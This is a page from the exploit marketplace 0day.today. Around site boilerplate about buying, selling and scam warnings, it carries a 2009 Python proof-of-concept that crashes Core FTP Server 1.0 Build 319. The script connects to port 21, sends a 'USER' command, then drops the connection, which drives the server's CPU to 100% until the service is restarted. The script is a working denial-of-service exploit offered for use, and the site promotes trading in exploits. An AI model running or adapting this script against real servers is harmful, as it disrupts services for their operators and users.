0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Core FTP Server 1.0 Build 319 Denial of Service
=============================================== Core FTP Server 1.0 Build 319 Denial of Service =============================================== # Title: Core FTP Server 1.0 Build 319 Denial of Service # CVE-ID: () # OSVDB-ID: () # Author: Mert SARICA # Published: 2009-12-04 # Verified: yes view source print? # Note: FTP account is not required for exploitation # http://www.mertsarica.com # I discovered a denial-of-service vulnerability on Core FTP Server product. # When you send "USER test\r\n" and then kills the connection # immediately, cpu increases to 100% and stays at that level until you # stop the ftp service. import socket, sys HOST = 'localhost' PORT = 21 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((HOST, PORT)) except: print "Connection error" sys.exit(1) try: s.send('USER MS\r\n') # magic packet s.close() print("Very good, young padawan, but you still have much to learn...") except: print "Connection error" sys.exit(1) # 0day.today [2024-12-24] #